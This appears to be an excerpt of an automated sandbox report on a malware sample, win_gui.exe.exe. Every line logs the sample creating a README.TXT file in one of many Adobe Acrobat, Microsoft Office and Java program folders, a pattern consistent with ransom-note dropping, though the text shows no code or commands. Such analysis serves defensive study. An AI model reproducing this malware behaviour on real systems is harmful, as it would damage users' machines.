Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\policy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\images\cursors\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\Backgrounds\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\Bibliography\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\DataServices\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\PUBFTSCM\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\PUBSPAPR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\QuickStyles\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\GettingStarted16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\ONENOTE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\private\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\DESIGNER\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\ODBC\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\Microsoft Office\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Office\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft SQL Server\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Power Map Excel Add-in\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Power View Excel Add-in\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\PowerPivot Excel Add-in\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\PowerPivot Excel Add-inv16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\Sort\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\Style\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\en\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\Analysis\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\SOLVER\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\Images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ar\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\bg\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ca\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\cs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\da\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\de\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\el\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\en-us\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\et\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\eu\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\fi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\fr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\gl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\he\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hu\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\id\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\it\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ja\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\kk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ko\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\lt\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\lv\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ms\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\nl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\no\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pt\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pt-BR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ro\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ru\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Cyrl-BA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Cyrl-RS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Latn-RS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sv\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\th\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\tr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\uk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\vi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\zh-CN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\zh-TW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\Salesforce\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\SearchView\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\TextInputIntelligence\en-us\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000002\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000006\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000011\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000018\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000027\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000042\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000043\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000049\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000050\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000054\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000055\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000058\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000062\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000063\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000064\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000068\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000069\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000070\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000072\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000076\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000079\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000083\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000084\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000087\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000088\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000099\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000098\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000101\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000104\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000105\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000106\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000107\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000108\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000113\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000117\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000118\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000119\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000120\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000122\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000123\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\fa000000124\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000125\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000128\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\fa000000129\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000130\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000131\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000132\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000135\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000137\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000138\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000139\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000140\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000141\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000142\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000144\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000145\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\ICU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\README.TXTJump to behavior
